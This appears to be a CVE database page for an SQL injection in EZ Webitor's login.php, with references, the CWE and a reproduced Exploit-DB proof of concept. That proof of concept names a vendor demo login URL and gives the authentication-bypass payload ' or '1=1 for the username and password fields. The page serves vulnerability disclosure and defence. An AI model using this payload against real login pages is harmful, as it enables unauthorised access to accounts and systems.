CVE-2009-4933
Description
Multiple SQL injection vulnerabilities in login.php in EZ Webitor allow remote attackers to execute arbitrary SQL commands via the (1) txtUserId (Username) and (2) txtPassword (Password) parameters. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
EZ Webitor - Authentication Bypass
-------------------------AllaH AkbaR-------------------------------
ezwebitor (Auth Bypass) Remote Sql Injection
---------------------------------------------------------------------------
Discovered By: Snakespc ALGERIAN HaCkEr
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa : Serra7 merra7 , koulchi mderra7>>>>
Aflawa Kamikaz Wa4rin Fi kol Bla4s
-------------------------SNAKES TEAM-------------------------------------
Script:
http://www.ezwebitor.com
-------------------------SNAKES TEAM-------------------------------------
Exploit:
-----------
http://www.ezwebitor.com/demo_standard/ezw/login.php
Username: ' or '1=1
Password: ' or '1=1
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> ( Members )
Str0ke >>>>>>>Milw0rm
# milw0rm.com [2009-04-20]
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| winterwebs | ezwebitor | | |
References
- http://secunia.com/advisories/34819
- http://www.exploit-db.com/exploits/8487
- http://www.securityfocus.com/bid/34604
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49966
- http://secunia.com/advisories/34819
- http://www.exploit-db.com/exploits/8487
- http://www.securityfocus.com/bid/34604
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49966
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.